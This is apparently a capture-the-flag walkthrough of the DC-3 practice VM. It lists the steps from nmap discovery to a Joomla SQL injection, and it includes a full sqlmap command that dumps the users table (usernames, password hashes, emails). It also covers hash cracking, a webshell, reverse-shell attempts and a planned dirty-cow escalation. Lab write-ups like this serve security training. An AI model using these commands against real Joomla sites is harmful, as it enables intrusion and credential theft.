you can download it here: http://www.five86.com/downloads/DC-3.zip
use nmap to discover the target:
nmap -Pn 192.168.227.0/24
check port 80
use whatweb to scan the website
it is using joomla, try joomlavs
ruby joomlavs.rb –url http://192.168.227.138/ -a
it is vulnerable to sql which will leads to rce
tried msf, but failed because adminstrator is not logged in.
switch to sqlmap,
sqlmap -u “http://192.168.227.138/index.php/fr/?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D joomladb -T “#__users” -C username,password,email –dump -p “list[fullordering]” –dbms=mysql –technique E
use john to decrypt the hash and login as admin to website, install the language pack to get shell
tried using nc and bash to get a reverse shell but failed, download a webshell first;
stucked for a while, tried suid, sudo, sensitive files, nothing.
try some exploit on os system, uname -a && lsb_release -a
ubuntu 16.04, quite old, dirty-cow should work